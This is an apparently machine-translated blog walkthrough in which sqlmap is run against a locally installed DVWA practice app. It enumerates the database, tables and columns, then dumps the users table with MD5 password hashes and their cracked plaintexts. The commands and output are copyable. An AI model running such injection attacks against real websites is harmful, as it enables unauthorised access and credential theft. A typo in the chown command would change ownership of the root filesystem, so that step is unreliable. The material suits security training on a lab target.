Get the background user name and password of the website by detecting sql injection vulnerability through sqlnamp

lnmp environment needs to be built in advance

  • Install sqlmapproject sqlmap
[root@ localhost ~]# tar -xvzf sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz 
[root@ localhost ~]# cd sqlmapproject-sqlmap-7eab1bc/
[root@ localhost sqlmapproject-sqlmap-7eab1bc]# python sqlmap.py
  • Unzip DVWA master to the root directory of the website
[root@ localhost ~]# unzip DVWA-master.zip
[root@ localhost ~]# mv DVWA-master/* /var/www/html/
[root@ localhost ~]# chown apache:apache /var/www/html / -R   
[root@ localhost ~]# vim /var/www/html/config/config.inc.php.dist
 29 $_DVWA[ 'recaptcha_public_key' ]  = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';
 30 $_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';

[root@ localhost ~]# mv /var/www/html/config/config.inc.php.dist /var/www/html/config.php
  • Modify php.ini
[root@ localhost ~]# vim /etc/php.ini
 815 allow_url_include = On
  • Access service create test database user name admin password

  • Simulation attack
    Get database information
[root@ localhost sqlmapproject-sqlmap-7eab1bc]# ./sqlmap.py -u "http://192.168.1.63/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit"  --cookie="security=low; PHPSESSID=seodas3m78pp388d9p2l956k16" -b --current-db  --current-user
......
[16:38:18] [INFO] the back-end DBMS is MySQL
[16:38:18] [INFO] fetching banner
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0
banner:    '5.5.64-MariaDB'
[16:38:18] [INFO] fetching current user
current user:    'root@localhost'
[16:38:18] [INFO] fetching current database
current database:    'dvwa'
[16:38:18] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.124.71'


[root@ localhost sqlmapproject-sqlmap-7eab1bc]# ./sqlmap.py -u "http://192.168.124.71/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="security=low; PHPSESSID=hnc9m48irt9e313sk9kt1lsgh4" -D dvwa --tables
......
[16:45:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0
[16:45:15] [INFO] fetching tables for database: 'dvwa'
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+



[root@ localhost sqlmapproject-sqlmap-7eab1bc]# ./sqlmap.py -u "http://192.168.124.71/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="security=low; PHPSESSID=hnc9m48irt9e313sk9kt1lsgh4" -D dvwa -T users --columns
......
[16:48:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0
[16:48:10] [INFO] fetching columns for table 'users' in database 'dvwa'
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int(3)      |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| password     | varchar(32) |
| user_id      | int(6)      |
+--------------+-------------+



[root@ localhost sqlmapproject-sqlmap-7eab1bc]# ./sqlmap.py -u "http://192.168.124.71/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="security=low; PHPSESSID=hnc9m48irt9e313sk9kt1lsgh4" -D dvwa -T users -C user,password --dump
......
Database: dvwa
Table: users
[5 entries]
+---------+---------------------------------------------+
| user    | password                                    |
+---------+---------------------------------------------+
| 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   |
| pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------+---------------------------------------------+

sqlmap common parameters

-u: specify target URL, syql injection point
 -b: get the identification of database type retrieval database management system  
-T: DBMS database tables to enumerate
 -C: Columns in the DBMS data table to enumerate


--Dump: dump DBMS data table entries
 --cookie: cookie value for the current session
 --- current DB: get the current database
 --Current user: get the user currently logged in to the database
Published 12 original articles, won praise 8, visited 290
Private letter follow

Tags: Database PHP MySQL Apache

Posted on Fri, 14 Feb 2020 06:39:42 -0800 by Valdoua